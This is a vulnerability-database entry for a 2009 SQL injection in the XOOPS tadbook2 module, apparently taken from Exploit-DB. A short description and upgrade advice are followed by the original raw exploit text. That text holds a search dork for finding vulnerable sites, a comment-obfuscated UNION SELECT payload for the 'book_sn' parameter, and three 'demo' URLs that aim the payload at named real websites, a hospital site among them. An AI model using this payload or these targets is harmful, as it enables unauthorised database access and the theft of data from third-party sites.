XOOPS Module: tadbook2

vendor:

tadbook2

by:

Stylextra

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: tadbook2

Affected Version From: 2

Affected Version To: Other versions

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

A SQL injection vulnerability exists in XOOPS Module: tadbook2, which allows an attacker to execute arbitrary SQL commands via the 'book_sn' parameter in open_book.php. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The vulnerability is confirmed in version 2.0. The vulnerability is also present in other versions.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version.

Source

Exploit-DB raw data:

##########################################
#
# XOOPS Module:  tadbook2
#
#
##########################################
#
##AUTHOR : Stylextra
#
####HOME : http://www.zamet.org
#
####MAIL : Slawi-team@hotmail.fr
#
###########################################
#
# DORKS : dork: /modules/tadbook2/open_book.php?book_sn=
###########################################
 
target: scriptpage.com/modules/tadbook2/open_book.php?book_sn=[sql Code]
 
Sql code: -99/**/union/**/select/**/version(),2/*
 
live link: http://xxx.com/modules/tadbook2/open_book.php?book_sn=-99/**/union/**/select/**/version(),2/*
 
demo1 : http://pr.hosp.ncku.edu.tw/modules/tadbook2/open_book.php?book_sn=-5/**/union/**/select/**/version(),2/*
 
demo2 : http://www.off.tw/modules/tadbook2/open_book.php?book_sn=-1/**/union/**/select/**/version(),2/*
 
demo3 : http://www.taot.org.tw/modules/tadbook2/open_book.php?book_sn=-10/**/union/**/select/**/version(),2/*

# milw0rm.com [2009-01-11]